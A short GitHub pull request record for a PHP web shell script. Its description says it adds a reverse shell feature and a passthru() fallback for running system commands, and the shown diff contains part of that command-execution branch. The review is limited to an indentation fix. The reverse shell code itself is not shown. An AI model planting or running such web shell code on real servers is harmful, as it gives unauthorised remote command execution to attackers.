### PR TITLE
Some small modifications

### PR DESCRIPTION
**Pull request by knadt**
Added a reverse shell functionality. Just by specifying IP
Added new if statement to perform system command `passthru()`
Updated README.md

### CODE REVIEW

File: shell.php [hunk 1]
```diff
@@ -38,15 +62,21 @@
 
        # http://php.net/manual/en/function.call-user-func.php
        call_user_func('system', $command);
+    
+    } else if(function_exists('passthru')) {
+        
+        # https://www.php.net/manual/en/function.passthru.php
+		ob_start();
```
Comment (leonjza) [inline shell.php]: Could we fix the indentation here?

Comment (knadt) [reply shell.php]: done

**Comment by knadt** [comment]
Done. please check

**Comment by leonjza** [comment]
Thanks!

**Pull request merged**